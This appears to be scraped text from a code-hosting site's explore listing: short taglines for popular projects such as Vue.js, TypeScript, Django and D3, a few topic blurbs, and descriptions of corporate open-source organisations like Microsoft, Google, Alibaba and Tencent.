A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.